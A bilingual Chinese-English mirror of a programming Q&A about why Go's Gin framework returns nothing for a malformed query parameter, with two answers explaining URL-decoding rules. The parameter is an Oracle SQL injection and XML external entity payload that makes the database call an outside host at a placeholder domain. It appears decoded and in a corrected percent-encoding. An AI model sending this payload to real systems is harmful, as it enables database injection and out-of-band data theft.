英文:
Missing query parameter in request
问题
运行以下Go代码:
package main
import (
"fmt"
"github.com/gin-gonic/gin"
)
func main() {
r := gin.Default()
r.GET("/", func(c *gin.Context) {
qParam, ok := c.GetQuery("fromDate") // qParam is nil
query := c.Request.URL.Query() // query is empty
rawQuery := c.Request.URL.RawQuery // contains the parameter
fmt.Println(qParam, ok, query, rawQuery)
c.JSON(200, gin.H{
"message": "pong",
})
})
r.Run("localhost:8181")
}
使用以下查询参数,Golang似乎没有返回它:
fromDate=%7bbase%7d%7c%7cextractvalue(xmltype('%3c!DOCTYPE%20root%20[%3c!ENTITY%20%%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3e%xxx%3b]%3e'),'%2fl')
尽管它存在于URL.RawQuery中:
我需要访问这个值以便验证它并返回错误代码,但由于它被返回为nil,我无法做到这一点。
英文:
Running the following go code:
package main
import (
"fmt"
"github.com/gin-gonic/gin"
)
func main() {
r := gin.Default()
r.GET("/", func(c *gin.Context) {
qParam, ok := c.GetQuery("fromDate") // qParam is nil
query := c.Request.URL.Query() // query is empty
rawQuery := c.Request.URL.RawQuery // contains the parameter
fmt.Println(qParam, ok, query, rawQuery)
c.JSON(200, gin.H{
"message": "pong",
})
})
r.Run("localhost:8181")
}
With the following query parameter, golang seems to not be returning it:
fromDate=%7bbase%7d%7c%7cextractvalue(xmltype('%3c!DOCTYPE%20root%20[%3c!ENTITY%20%%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3e%xxx%3b]%3e'),'%2fl')
Although it is present in the URL.RawQuery:
debug screenshot
I need to access this value so I can validate it and return an error code, but as it is returned as nil I cannot do that.
答案1
得分: 1
Gin的c.Query()和URL.Query()是相同的:
如果存在,
Query返回键入的URL查询值,否则返回空字符串("")。它是c.Request.URL.Query().Get(key)的快捷方式。
而URL.Query()会默默地丢弃无效的参数。
你上面展示的查询参数是无效的。在调用服务器端点之前,你应该正确转义原始字符串。
如果这不在你的控制范围内,你可能就没办法了。你可以尝试修复原始参数,但这是任意的且不可扩展的。
记录一下,这是你原始查询字符串可能的样子:
{base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY xxx SYSTEM {base}"http://{domain}/ext1"> xxx;]'),'/l')
英文:
Gin c.Query() and URL.Query() are the same:
> Query returns the keyed url query value if it exists, otherwise it returns an empty string (""). It is shortcut for c.Request.URL.Query().Get(key)
And URL.Query() silently discards invalid params.
The query param you showed above is invalid. You should properly escape the original string before calling the server endpoint.
If this is not under your control, you may just be out of luck. You could attempt fixing the raw param, but that is arbitrary and not scalable.
For the record, this is what your original query string might look like:
{base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY xxx SYSTEM {base}"http://{domain}/ext1"> xxx;]>'),'/l')
答案2
得分: 1
如果你的原始查询字符串是:
fromDate={base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY % xxx SYSTEM {base}"http://{domain}/ext1">%xxx;]>'),'/l')
那么你应该像这样对查询进行编码(我认为这不是一个好方法):
fromDate=%7bbase%7d%7c%7cextractvalue(xmltype('%3C!DOCTYPE%20root%20[%3C!ENTITY%20%25%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3E%25xxx%3b]%3E'),'%2fl')
因为你原始字符串中的'%'被编码为'%'而不是'%25',所以'%%'会被错误解析。
英文:
If your original query string is:
fromDate={base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY % xxx SYSTEM {base}"http://{domain}/ext1">%xxx;]>'),'/l')
then you should encode the query like this(i don't think it is a good way):
fromDate=%7bbase%7d%7c%7cextractvalue(xmltype(%27%3C!DOCTYPE%20root%20[%3C!ENTITY%20%25%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3E%25xxx%3b]%3E%27),%27%2fl%27)
because the '%' in your original string was encoded as '%' not '%25' so the '%%' would be parsed with error.
通过集体智慧和协作来改善编程学习和解决问题的方式。致力于成为全球开发者共同参与的知识库,让每个人都能够通过互相帮助和分享经验来进步。
评论